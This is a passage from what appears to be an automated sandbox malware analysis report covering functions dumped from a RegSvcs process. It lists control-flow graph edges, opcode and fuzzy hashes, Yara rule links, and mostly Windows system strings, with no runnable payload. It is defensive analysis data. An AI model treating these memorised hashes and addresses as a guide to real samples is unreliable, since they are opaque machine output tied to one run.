                                                                  • Opcode Fuzzy Hash: b497df8a9bee1b1d6ddce710c28593f98a6e1f4d4afb39ff49d3449b06f62be0
                                                                  • Instruction Fuzzy Hash: E1A00231551216478292AA19488D46EB158BBD421134DC346D1468A45BD7255492B6A6
                                                                  Function 019B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 6 19b35c0-19b35cc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: c9ae0fa1434d86dad15fbea305fea12893509184904a1354b41e5a44900b9ee7
                                                                  • Instruction ID: 09062d2f6dc61e30a108a396d8538426a5c6145c516dfae7210b717ebb33cf4a
                                                                  • Opcode Fuzzy Hash: c9ae0fa1434d86dad15fbea305fea12893509184904a1354b41e5a44900b9ee7
                                                                  • Instruction Fuzzy Hash: 6E90023160560402D100715D4518706504997D0601F65C415A0864568DC7968A5166A3
                                                                  Function 0042E443 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 19 42e443-42e484 call 42e933 23 42e486-42e4a3 19->23 24 42e4de-42e4e3 19->24 26 42e4b6-42e4db 23->26 27 42e4a5-42e4ad 23->27 26->24 29 42e4b3 27->29 29->26
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                                  • Instruction ID: 4366241f30172668ac266cf9dbbaaf2ab3a96406b79bd4ea90d7b1ecfc278b4f
                                                                  • Opcode Fuzzy Hash: b91d6c93db0535fe72404564a29c3e6695632f1d3c42c2318da097e51fd83d29
                                                                  • Instruction Fuzzy Hash: 6B017971D0122866FB60EB95AC42FD973B89B08315F4006DAF50CA25C1FF74A78C8A55
                                                                  Function 0042E43E Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 7 42e43e-42e45a 8 42e469-42e470 7->8 9 42e464 call 42e933 7->9 10 42e47f-42e484 8->10 9->8 11 42e486-42e48f 10->11 12 42e4de-42e4e3 10->12 13 42e49e-42e4a3 11->13 14 42e4b6-42e4db 13->14 15 42e4a5-42e4ad 13->15 14->12 17 42e4b3 15->17 17->14
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                                  • Instruction ID: 404c73420e7ccc61c58b20341cebbccbd52cb142bdd450d9b6ac3c885e858c85
                                                                  • Opcode Fuzzy Hash: d1f73a97459dc5326ad298b62fd1992b1f71635c7eaa89ed498aed683d0cc593
                                                                  • Instruction Fuzzy Hash: 42019671D021246AFB60EB95AC42FDDB3B49B08305F400ADAE508A2581EF78A7888B55
                                                                  Function 0042E7F7 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 31 42e7f7-42e801 32 42e803-42e82e 31->32 33 42e834-42e845 32->33
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                                  • Instruction ID: 31242dfcbd3f96dd699b4558cde109ee15ad417a935ac94cd5934c0012438835
                                                                  • Opcode Fuzzy Hash: f517df6aac4fc84ce8a87d0679e17b2a921ba94886c7872b57f22e959787194e
                                                                  • Instruction Fuzzy Hash: C0F03A7661030AAFDB04CF55D885EEBB3ADBB88350F44C219FD198B641EB75E910CBA0
                                                                  Function 0042E969 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 34 42e969-42e988 35 42e98e-42e995 34->35 36 42e997-42e999 35->36 37 42e9a9-42e9ac 35->37 36->37 38 42e99b-42e9a7 call 42e933 36->38 38->37
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                                  • Instruction ID: 9450f4893f1b544faf21d748d5bf1faa69d539990d9b7b546b78aef50944f596
                                                                  • Opcode Fuzzy Hash: 91ad61eaa096fd1b48b4794f7a42c5454aa66564d8e26f254c8216750448d8ed
                                                                  • Instruction Fuzzy Hash: 25E09B72F412246BD7209666AC05FABB768DFD1760F18007FFD0897341E175585087D9
                                                                  Function 0042E973 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 43 42e973-42e988 44 42e98e-42e995 43->44 45 42e997-42e999 44->45 46 42e9a9-42e9ac 44->46 45->46 47 42e99b-42e9a7 call 42e933 45->47 47->46
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                                  • Instruction ID: b45b16270b7c92ecc088d3bbc55ba942c8e19ef5250ac7cf6bfce4062317808b
                                                                  • Opcode Fuzzy Hash: 72c85ca60cf26629b888706018e63b4fd17f9be6f1efe7643e2c5c8123341bf7
                                                                  • Instruction Fuzzy Hash: 04E0D87270022427D620554AAC05FAB735C9FC0B20F48002BFE0897301D164A84082E9
                                                                  Function 0042E803 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 41 42e803-42e82e 42 42e834-42e845 41->42
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                                  • Instruction ID: ed3f3c4a1f71d5893b28c54a4458e4a2cb9e16b5f970c0aa03921f96b0cc64a3
                                                                  • Opcode Fuzzy Hash: e5fdaa5cb08acbbdf9c8b0a0c6bbe4ed815358be749576dea5613706cb188032
                                                                  • Instruction Fuzzy Hash: EFF098B6610209AFDB04CF59D885EEB73A9BB88750F048559FD198B241D774EA108BA1
                                                                  Function 0042E893 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 50 42e893-42e8a6 51 42e8ac-42e8b0 50->51
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710154162.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_42e000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                                  • Instruction ID: 3eca5127519bf68b1d5e67e2a562a6eab0631c4a37908332f397cdab7da05a69
                                                                  • Opcode Fuzzy Hash: 1588e10cb8000158141308b7c049b3d6da6c26fcd9cfad5ec22e1243578cb56d
                                                                  • Instruction Fuzzy Hash: 9AC012716002086BDB00DA88DC46F66339C9748610F444455B91C8B241D571B9504698

                                                                  Non-executed Functions

                                                                  Function 019B4A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 52 19b4a80-19b4a8b 53 19b4a9f-19b4aa6 52->53 54 19b4a8d-19b4a99 RtlDebugPrintTimes 52->54 55 19b4aa8-19b4aae 53->55 56 19b4aaf-19b4ab6 call 199f5a0 53->56 54->53 59 19b4b25-19b4b26 54->59 61 19b4ab8-19b4b22 call 19a1e46 * 2 56->61 62 19b4b23 56->62 61->62 62->59
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0I9w$0I9w$0I9w$0I9w$0I9w$0I9w
                                                                  • API String ID: 3446177414-1295150601
                                                                  • Opcode ID: c95b6122c9bdec2b1ae62eea3e226c759b7f1d160f9c87c97b2464cec07daa78
                                                                  • Instruction ID: f65fb148e459caa73d8a8c6600f29fd84504947445069cfa090306e901d01e91
                                                                  • Opcode Fuzzy Hash: c95b6122c9bdec2b1ae62eea3e226c759b7f1d160f9c87c97b2464cec07daa78
                                                                  • Instruction Fuzzy Hash: 5101B136E053109FDB709E287A487C73AD5B789738F26005AEA0D8B2A9D7704C42E795
                                                                  Function 019B2890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 263 19b2890-19b28b3 264 19ea4bc-19ea4c0 263->264 265 19b28b9-19b28cc 263->265 264->265 266 19ea4c6-19ea4ca 264->266 267 19b28ce-19b28d7 265->267 268 19b28dd-19b28df 265->268 266->265 270 19ea4d0-19ea4d4 266->270 267->268 271 19ea57e-19ea585 267->271 269 19b28e1-19b28e5 268->269 272 19b28eb-19b28fa 269->272 273 19b2988-19b298e 269->273 270->265 274 19ea4da-19ea4de 270->274 271->268 275 19ea58a-19ea58d 272->275 276 19b2900-19b2905 272->276 277 19b2908-19b290c 273->277 274->265 278 19ea4e4-19ea4eb 274->278 275->277 276->277 277->269 279 19b290e-19b291b 277->279 280 19ea4ed-19ea4f4 278->280 281 19ea564-19ea56c 278->281 282 19b2921 279->282 283 19ea592-19ea599 279->283 285 19ea50b 280->285 286 19ea4f6-19ea4fe 280->286 281->265 284 19ea572-19ea576 281->284 288 19b2924-19b2926 282->288 295 19ea5a1-19ea5c9 call 19c0050 283->295 284->265 289 19ea57c call 19c0050 284->289 287 19ea510-19ea536 call 19c0050 285->287 286->265 290 19ea504-19ea509 286->290 303 19ea55d-19ea55f 287->303 292 19b2928-19b292a 288->292 293 19b2993-19b2995 288->293 289->303 290->287 300 19b292c-19b292e 292->300 301 19b2946-19b2966 call 19c0050 292->301 293->292 298 19b2997-19b29b1 call 19c0050 293->298 312 19b2969-19b2974 298->312 300->301 306 19b2930-19b2944 call 19c0050 300->306 301->312 309 19b2981-19b2985 303->309 306->301 312->288 314 19b2976-19b2979 312->314 314->295 315 19b297f 314->315 315->309
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID:
                                                                  • API String ID: 48624451-0
                                                                  • Opcode ID: 7ef88d8d6328fc688e4a770af82d33ab95da7d84fa7524523eb96adf0baf012a
                                                                  • Instruction ID: a9bac4bc08cc7551c0ecca4c0a9a6ebfe81ad3a0913de66d1efb24fdce823949
                                                                  • Opcode Fuzzy Hash: 7ef88d8d6328fc688e4a770af82d33ab95da7d84fa7524523eb96adf0baf012a
                                                                  • Instruction Fuzzy Hash: 1351D4B5A00116BBDB21DB9CCAD09BEFBB8FB48641B148529E4ADD7641D734EE0087E1
                                                                  Function 0198A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 316 198a250-198a26f 317 198a58d-198a594 316->317 318 198a275-198a291 316->318 317->318 319 198a59a-19d79bb 317->319 320 19d79e6-19d79eb 318->320 321 198a297-198a2a0 318->321 319->318 324 19d79c1-19d79c6 319->324 321->320 323 198a2a6-198a2ac 321->323 325 198a6ba-198a6bc 323->325 326 198a2b2-198a2b4 323->326 327 198a473-198a479 324->327 328 198a2ba-198a2bd 325->328 329 198a6c2 325->329 326->320 326->328 328->320 330 198a2c3-198a2c6 328->330 329->330 331 198a2c8-198a2d1 330->331 332 198a2da-198a2dd 330->332 333 19d79cb-19d79d5 331->333 334 198a2d7 331->334 335 198a2e3-198a32b 332->335 336 198a6c7-198a6d0 332->336 337 19d79da-19d79e3 call 19ff290 333->337 334->332 338 198a330-198a335 335->338 336->335 339 198a6d6-19d79ff 336->339 337->320 342 198a33b-198a343 338->342 343 198a47c-198a47f 338->343 339->337 345 198a34f-198a35d 342->345 346 198a345-198a349 342->346 343->345 347 198a485-198a488 343->347 349 198a48e-198a49e 345->349 350 198a363-198a368 345->350 346->345 348 198a59f-198a5a8 346->348 347->349 351 19d7a16-19d7a19 347->351 353 198a5aa-198a5ac 348->353 354 198a5c0-198a5c3 348->354 349->351 352 198a4a4-198a4ad 349->352 355 198a36c-198a36e 350->355 351->355 356 19d7a1f-19d7a24 351->356 352->355 353->345 357 198a5b2-198a5bb 353->357 358 198a5c9-198a5cc 354->358 359 19d7a01 354->359 360 19d7a26 355->360 361 198a374-198a38c call 198a6e0 355->361 362 19d7a2b 356->362 357->355 364 19d7a0c 358->364 365 198a5d2-198a5d5 358->365 359->364 360->362 369 198a4b2-198a4b9 361->369 370 198a392-198a3ba 361->370 363 19d7a2d-19d7a2f 362->363 363->327 367 19d7a35 363->367 364->351 365->353 371 198a3bc-198a3be 369->371 372 198a4bf-198a4c2 369->372 370->371 371->363 374 198a3c4-198a3cb 371->374 372->371 373 198a4c8-198a4d3 372->373 373->338 375 198a3d1-198a3d4 374->375 376 19d7ae0 374->376 377 198a3e0-198a3ea 375->377 378 19d7ae4-19d7afc call 19ff290 376->378 377->378 379 198a3f0-198a40c call 198a840 377->379 378->327 384 198a412-198a417 379->384 385 198a5d7-198a5e0 379->385 384->327 386 198a419-198a43d 384->386 387 198a601-198a603 385->387 388 198a5e2-198a5eb 385->388 389 198a440-198a443 386->389 391 198a629-198a631 387->391 392 198a605-198a623 call 1974508 387->392 388->387 390 198a5ed-198a5f1 388->390 394 198a4d8-198a4dc 389->394 395 198a449-198a44c 389->395 396 198a681-198a6ab RtlDebugPrintTimes 390->396 397 198a5f7-198a5fb 390->397 392->327 392->391 399 19d7a3a-19d7a42 394->399 400 198a4e2-198a4e5 394->400 401 198a452-198a454 395->401 402 19d7ad6 395->402 396->387 415 198a6b1-198a6b5 396->415 397->387 397->396 403 19d7a48-19d7a4c 399->403 404 198a634-198a64a 399->404 400->404 405 198a4eb-198a4ee 400->405 406 198a45a-198a461 401->406 407 198a520-198a539 call 198a6e0 401->407 402->376 403->404 409 19d7a52-19d7a5b 403->409 410 198a650-198a659 404->410 411 198a4f4-198a50c 404->411 405->395 405->411 413 198a57b-198a582 406->413 414 198a467-198a46c 406->414 425 198a65e-198a665 407->425 426 198a53f-198a567 407->426 417 19d7a5d-19d7a60 409->417 418 19d7a85-19d7a87 409->418 410->401 411->395 419 198a512-198a51b 411->419 413->377 416 198a588 413->416 414->327 421 198a46e 414->421 415->387 416->376 422 19d7a6e-19d7a71 417->422 423 19d7a62-19d7a6c 417->423 418->404 424 19d7a8d-19d7a96 418->424 419->401 421->327 430 19d7a7e 422->430 431 19d7a73-19d7a7c 422->431 429 19d7a81 423->429 424->401 427 198a569-198a56b 425->427 428 198a66b-198a66e 425->428 426->427 427->414 433 198a571-198a573 427->433 428->427 432 198a674-198a67c 428->432 429->418 430->429 431->424 432->389 434 198a579 433->434 435 19d7a9b-19d7aa4 433->435 434->413 435->434 436 19d7aaa-19d7ab0 435->436 436->434 437 19d7ab6-19d7abe 436->437 437->434 438 19d7ac4-19d7acf 437->438 438->437 439 19d7ad1 438->439 439->434
                                                                  Strings
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019D79D5
                                                                  • SsHd, xrefs: 0198A3E4
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 019D79D0, 019D79F5
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019D79FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                  • API String ID: 0-929470617
                                                                  • Opcode ID: 0be1bc702e24db0184e9a51cd78684baf1ed9a28004ead6ec230a1a2899e0401
                                                                  • Instruction ID: 755d2c5a07552c27e25b1f11d8804f55152d74ed2810fe12005c8f40a663a998
                                                                  • Opcode Fuzzy Hash: 0be1bc702e24db0184e9a51cd78684baf1ed9a28004ead6ec230a1a2899e0401
                                                                  • Instruction Fuzzy Hash: C8E1D6716043028FDB29DE6CC884B2ABBE5BB84319F144A2FF95ECB291D731D985C752
                                                                  Function 0198D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 440 198d770-198d7ab 441 198d7b1-198d7bb 440->441 442 198d9e7-198d9ee 440->442 444 198d7c1-198d7ca 441->444 445 19d9357 441->445 442->441 443 198d9f4-19d932c 442->443 443->441 451 19d9332-19d9337 443->451 444->445 447 198d7d0-198d7d3 444->447 448 19d9361-19d9370 445->448 449 198d7d9-198d7db 447->449 450 198d9da-198d9dc 447->450 454 19d934b-19d9354 call 19ff290 448->454 449->445 452 198d7e1-198d7e4 449->452 450->452 453 198d9e2 450->453 455 198d927-198d938 call 19b4c30 451->455 452->445 456 198d7ea-198d7ed 452->456 453->456 454->445 461 198d9f9-198da02 456->461 462 198d7f3-198d7f6 456->462 461->462 463 198da08-19d9346 461->463 464 198d7fc-198d848 call 198d660 462->464 465 198da0d-198da16 462->465 463->454 464->455 470 198d84e-198d852 464->470 465->464 467 198da1c 465->467 467->448 470->455 471 198d858-198d85f 470->471 472 198d9d1-198d9d5 471->472 473 198d865-198d869 471->473 474 19d9563-19d957b call 19ff290 472->474 475 198d870-198d87a 473->475 474->455 475->474 476 198d880-198d887 475->476 478 198d889-198d88d 476->478 479 198d8ed-198d90d 476->479 481 198d893-198d898 478->481 482 19d9372 478->482 483 198d910-198d913 479->483 484 19d9379-19d937b 481->484 485 198d89e-198d8a5 481->485 482->484 486 198d93b-198d940 483->486 487 198d915-198d918 483->487 484->485 492 19d9381-19d93aa 484->492 493 198d8ab-198d8e3 call 19b8250 485->493 494 19d93ea-19d93ed 485->494 490 19d94d3-19d94db 486->490 491 198d946-198d949 486->491 488 19d9559-19d955e 487->488 489 198d91e-198d920 487->489 488->455 495 198d971-198d98c call 198a6e0 489->495 496 198d922 489->496 497 198da21-198da2f 490->497 498 19d94e1-19d94e5 490->498 491->497 499 198d94f-198d952 491->499 492->479 500 19d93b0-19d93ca call 19c82c0 492->500 516 198d8e5-198d8e7 493->516 502 19d93f1-19d9400 call 19c82c0 494->502 522 19d9528-19d952d 495->522 523 198d992-198d9ba 495->523 496->455 504 198d954-198d964 497->504 506 198da35-198da3e 497->506 498->497 503 19d94eb-19d94f4 498->503 499->487 499->504 500->516 521 19d93d0-19d93e3 500->521 517 19d9417 502->517 518 19d9402-19d9410 502->518 511 19d94f6-19d94f9 503->511 512 19d9512-19d9514 503->512 504->487 513 198d966-198d96f 504->513 506->489 519 19d94fb-19d9501 511->519 520 19d9503-19d9506 511->520 512->497 525 19d951a-19d9523 512->525 513->489 516->479 524 19d9420-19d9424 516->524 517->524 518->502 528 19d9412 518->528 519->512 530 19d950f 520->530 531 19d9508-19d950d 520->531 521->500 532 19d93e5 521->532 526 198d9bc-198d9be 522->526 527 19d9533-19d9536 522->527 523->526 524->479 529 19d942a-19d9430 524->529 525->489 536 19d9549-19d954e 526->536 537 198d9c4-198d9cb 526->537 527->526 533 19d953c-19d9544 527->533 528->479 534 19d9457-19d9460 529->534 535 19d9432-19d944f 529->535 530->512 531->525 532->479 533->483 540 19d94a7-19d94a9 534->540 541 19d9462-19d9467 534->541 535->534 539 19d9451-19d9454 535->539 536->455 538 19d9554 536->538 537->472 537->475 538->488 539->534 542 19d94cc-19d94ce 540->542 543 19d94ab-19d94c6 call 1974508 540->543 541->540 544 19d9469-19d946d 541->544 542->455 543->455 543->542 546 19d946f-19d9473 544->546 547 19d9475-19d94a1 RtlDebugPrintTimes 544->547 546->540 546->547 547->540 550 19d94a3 547->550 550->540
                                                                  APIs
                                                                  Strings
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019D9346
                                                                  • GsHd, xrefs: 0198D874
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 019D9341, 019D9366
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019D936B
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A02000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A63000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_17_2_1940000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                  • API String ID: 3446177414-576511823
                                                                  • Opcode ID: da02e501921c321281ae01fb986edcdde7df18a427a6e40b17dd95f152317dac
                                                                  • Instruction ID: 4dfe0588e5818e614a18faf946c9fb36c6ed2eb34722f164d4c96809f62d3751
                                                                  • Opcode Fuzzy Hash: da02e501921c321281ae01fb986edcdde7df18a427a6e40b17dd95f152317dac
                                                                  • Instruction Fuzzy Hash: A9E1C7716043428FDB24EF98C480B6ABBE9BF89718F04892DE99DDB2C1D771D944CB52
                                                                  Function 019BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000011.00000002.2710676018.0000000001966000.00000040.00001000.00020000.00000000.sdmp, Offset: 01940000, based on PE: true
                                                                  • Associated: 00000011.00000002.2710676018.0000000001940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.0000000001947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000011.00000002.2710676018.00000000019C6000.00000040.00001000.00020000.00000000.sdmpDownload File
